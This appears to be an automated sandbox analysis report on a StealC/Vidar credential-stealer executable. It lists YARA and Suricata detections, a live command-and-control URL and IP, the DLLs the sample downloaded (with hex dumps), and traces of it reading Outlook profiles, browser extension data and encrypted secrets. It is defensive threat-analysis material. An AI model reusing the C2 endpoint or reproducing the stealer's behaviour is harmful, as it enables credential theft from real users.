Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA0C40 sqlite3_bind_zeroblob,	0_2_6CEA0C40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA0D60 sqlite3_bind_parameter_name,	0_2_6CEA0D60
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC8EA0 sqlite3_clear_bindings,	0_2_6CDC8EA0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CEA0B40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC6410 bind,WSAGetLastError,	0_2_6CDC6410
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC60B0 listen,WSAGetLastError,	0_2_6CDC60B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDCC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CDCC050
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC6070 PR_Listen,	0_2_6CDC6070
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDCC030 sqlite3_bind_parameter_count,	0_2_6CDCC030
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD522D0 sqlite3_bind_blob,	0_2_6CD522D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC63C0 PR_Bind,	0_2_6CDC63C0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.182.96.50	unknown	Russian Federation		34518	FATUM-ASRussiaKazan420061Kosmonavtovstr29aRU	true

Contacted URLs

Name	Malicious	Reputation
http://95.182.96.50/fee3b98529eb4b43/nss3.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/msvcp140.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/freebl3.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/mozglue.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/sqlite3.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/vcruntime140.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/softokn3.dll	true	unknown
http://95.182.96.50/	true	unknown
http://95.182.96.50/2aced82320799c96.php	true	unknown

AV Detection

Found malware configuration

Source: 9JtNIXVedn.exe.7776.0.memstrmin

Malware Configuration Extractor: StealC {"C2 url": "http://95.182.96.50/2aced82320799c96.php", "Botnet": "mainteam"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.3% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE1A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CE1A9A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE144C0 PK11_PubEncrypt,	0_2_6CE144C0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE14440 PK11_PrivDecrypt,	0_2_6CE14440
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDE4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CDE4420
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE625B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CE625B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDFE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CDFE6E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF8670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CDF8670
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE1A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CE1A650
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CE3A730
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE40180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CE40180
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE143B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6CE143B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE37C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6CE37C00
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6CDF7D60
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6CE3BD30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE39EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6CE39EC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE13FF0 PK11_PrivDecryptPKCS1,	0_2_6CE13FF0

Uses 32bit PE files

Source: 9JtNIXVedn.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 9JtNIXVedn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: mozglue.pdbP source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 95.182.96.50:80 -> 192.168.2.9:49711
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.182.96.50:80 -> 192.168.2.9:49711
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.9:49711 -> 95.182.96.50:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://95.182.96.50/2aced82320799c96.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 